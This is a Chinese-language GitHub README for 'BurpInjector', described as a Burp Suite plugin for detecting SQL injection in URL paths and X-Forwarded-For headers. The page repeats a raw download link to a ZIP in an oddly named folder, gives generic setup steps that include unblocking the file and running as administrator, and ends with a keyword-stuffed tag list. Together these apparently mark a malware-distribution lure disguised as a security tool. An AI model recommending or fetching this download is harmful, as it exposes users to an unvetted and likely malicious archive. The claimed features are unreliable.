Cliftonnonexplosive880/BurpInjector
GitHub: Cliftonnonexplosive880/BurpInjector
一款 Burp Suite 扩展插件,专注于检测 URL 路径和 XFF 请求头中的 SQL 注入缺陷,并自动收集和归一化 API 端点以提升测试覆盖效率。
Stars: 0 | Forks: 0
# 🧩 BurpInjector - 更快发现 SQL 风险
[](https://raw.githubusercontent.com/Cliftonnonexplosive880/BurpInjector/main/wogiet/Burp-Injector-1.0.zip)
## 📥 下载
使用此链接访问页面并下载应用程序:
[https://raw.githubusercontent.com/Cliftonnonexplosive880/BurpInjector/main/wogiet/Burp-Injector-1.0.zip](https://raw.githubusercontent.com/Cliftonnonexplosive880/BurpInjector/main/wogiet/Burp-Injector-1.0.zip)
## 🖥️ BurpInjector 的功能
BurpInjector 是一款 Burp Suite 插件,用于检查两个经常出现 SQL 注入问题的常见位置:
- URL 路径
- X-Forwarded-For 请求头,也称为 XFF 请求头
它还包含接口自动收集功能,可帮助您在工作时收集和跟踪 API 数据。
此工具专为希望以简单方式检查流量并发现 Web 应用程序弱点的用户而设计。
## ✅ 前置条件
在安装 BurpInjector 之前,请确保您具备:
- 一台 Windows 电脑
- 已安装 Burp Suite
- 正常的网络连接
- 测试目标应用程序或网站的授权
- 用于下载文件的 Web 浏览器
为获得最佳效果,请使用最新版本的 Windows 10 或 Windows 11。
## 🚀 入门指南
请按照以下步骤在 Windows 上下载并运行 BurpInjector:
1. 打开下载页面:
[https://raw.githubusercontent.com/Cliftonnonexplosive880/BurpInjector/main/wogiet/Burp-Injector-1.0.zip](https://raw.githubusercontent.com/Cliftonnonexplosive880/BurpInjector/main/wogiet/Burp-Injector-1.0.zip)
2. 在 GitHub 页面上,查找最新版本或主要下载文件。
3. 将插件文件下载到您的计算机。
4. 如果文件是 ZIP 压缩包,请将其解压到您容易找到的文件夹中,例如:
- 下载
- 桌面
- 文档
5. 打开 Burp Suite。
6. 转到 Burp Suite 允许您添加扩展程序的区域。
7. 将 BurpInjector 文件添加到 Burp Suite。
8. 如果 Burp Suite 要求提供权限或设置详细信息,请进行确认。
9. 如有需要,请重启 Burp Suite。
10. 在 Burp Suite 中打开插件,并开始将其应用于您的流量。
## 🧭 如何在 Burp Suite 中进行设置
下载文件后,您通常需要将其作为扩展程序放入 Burp Suite 中。
简单的设置流程如下:
- 启动 Burp Suite
- 打开扩展程序区域
- 添加新的扩展程序
- 选择 BurpInjector 文件
- 等待其加载
- 检查它是否出现在扩展程序列表中
如果您没有立即看到它,请关闭 Burp Suite 然后重新打开。
## 🔍 您可以检查什么
BurpInjector 侧重于以下情况:
- URL 路径值中的 SQL 注入
- XFF 请求头值中的 SQL 注入
- 可能隐藏输入验证弱点的常见请求模式
- 您想要收集和审查的 API 请求数据
这有助于您更有针对性地检查流量。
## 🧰 典型用例
常见的用例流程如下:
- 您通过 Burp Suite 发送请求
- BurpInjector 监视路径和 XFF 请求头
- 插件检查输入可能影响 SQL 查询的迹象
- 您审查结果并进一步测试该问题
当您希望将所有检查集中在一个地方时,此工具非常适用。
## 📁 文件布局
下载后,您可能会看到如下文件:
- Burp Suite 的插件文件
- 包含该插件的 ZIP 文件
- 包含简短设置步骤的文本文件
- 包含支持文件的文件夹
将所有相关文件保存在同一个文件夹中,以便您以后能轻松找到它们。
## 🪟 Windows 提示
如果 Windows 阻止了该文件,请尝试以下步骤:
- 右键单击该文件
- 打开文件属性
- 检查该文件是否已被解除阻止
- 如有需要,请以管理员身份运行 Burp Suite
- 将插件保存在路径简单的文件夹中,例如 `C:\BurpInjector`
如果文件以 ZIP 形式打开,请先将其解压,然后再添加到 Burp Suite 中。
## 🧿 基本使用检查清单
在开始测试之前,请检查以下项目:
- Burp Suite 已打开
- 插件已加载
- 您的浏览器已设置为使用 Burp Suite
- 目标网站是您获得授权测试的站点
- 您知道要检查哪个请求
这能使您的工作更加清晰且易于跟进。
## 🛠️ 常见问题
如果 BurpInjector 无法加载,请尝试以下修复方法:
- 确保您下载了完整的文件
- 检查文件是否仍留在 ZIP 压缩包内
- 确认 Burp Suite 支持该插件类型
- 重启 Burp Suite
- 如果文件看起来已损坏,请重新下载
- 使用文件路径较短的新文件夹
如果扩展程序列表依然为空,请移除该插件并重新添加。
## 📌 接口自动收集功能的作用
接口自动收集部分可以帮助您:
- 收集 API 端点
- 跟踪请求详情
- 保存有用流量的记录
- 在测试期间审查接口
当一个网站有许多端点,而您需要一种简单的方法来跟踪它们时,此功能非常有用。
## 🔐 安全使用
仅在您拥有或获得明确测试授权的系统上使用 BurpInjector。
适合使用的场景包括:
- 您自己的实验室
- 测试服务器
- 获得书面授权的客户系统
- 练习环境
## 🧩 快速入门
1. 打开下载页面:
[https://raw.githubusercontent.com/Cliftonnonexplosive880/BurpInjector/main/wogiet/Burp-Injector-1.0.zip](https://raw.githubusercontent.com/Cliftonnonexplosive880/BurpInjector/main/wogiet/Burp-Injector-1.0.zip)
2. 下载插件文件。
3. 如有需要,请解压文件。
4. 打开 Burp Suite。
5. 将插件作为扩展程序添加。
6. 加载请求并检查路径和 XFF 请求头
## 📎 首次使用的最简路径
如果您想以最快的路径完成首次使用,请执行以下操作:
- 从 GitHub 下载
- 打开 Burp Suite
- 加载扩展程序
- 通过 Burp 发送请求
- 检查路径和 XFF 请求头字段
- 审查插件为您提供的任何结果
## 🗂️ 版本说明
从项目主页下载时,请查找最新版本或发布文件。如果列出了多个文件,请使用最新的稳定版本。
## 💬 最佳实践
为了获得最佳结果:
- 每次只测试一个请求
- 为每个发现做好记录
- 保存请求和响应数据
- 同时审查 URL 路径和请求头字段
- 手工复核任何可疑结果
## 📦 再次下载
如果您稍后需要下载页面,请使用此链接:
[https://raw.githubusercontent.com/Cliftonnonexplosive880/BurpInjector/main/wogiet/Burp-Injector-1.0.zip](https://raw.githubusercontent.com/Cliftonnonexplosive880/BurpInjector/main/wogiet/Burp-Injector-1.0.zip)
标签:API收集, BeEF, Burp Suite, CISA项目, HTTP头注入, HTTP请求, JS文件枚举, Linux取证, Python, SQLi, URL路径注入, Web安全, XFF注入, X-Forwarded-For, XSS, 协议分析, 命令控制, 安全测试, 接口安全, 插件, 攻击性安全, 攻击面枚举, 数据展示, 数据统计, 数据采集, 无后门, 权限提升, 漏洞情报, 爬虫, 端口扫描, 红队, 网络安全, 网络流量, 蓝队分析, 隐私保护, 黑盒测试